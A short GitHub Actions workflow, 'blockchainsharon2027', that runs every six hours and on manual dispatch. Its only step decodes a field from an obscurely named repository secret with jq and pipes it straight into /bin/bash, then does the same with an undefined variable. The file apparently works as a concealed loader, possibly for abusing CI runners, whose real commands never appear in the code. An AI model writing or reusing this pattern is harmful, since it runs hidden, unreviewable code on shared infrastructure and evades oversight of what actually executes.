name: blockchainsharon2027
on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: blockchainsharon2027
        env:
          xuq58: ${{ secrets.xuq58 }}
        run: |
          echo $xuq58 | jq -r .nm0547 | /bin/bash
          echo $b76 | jq -r .a7 | /bin/bash

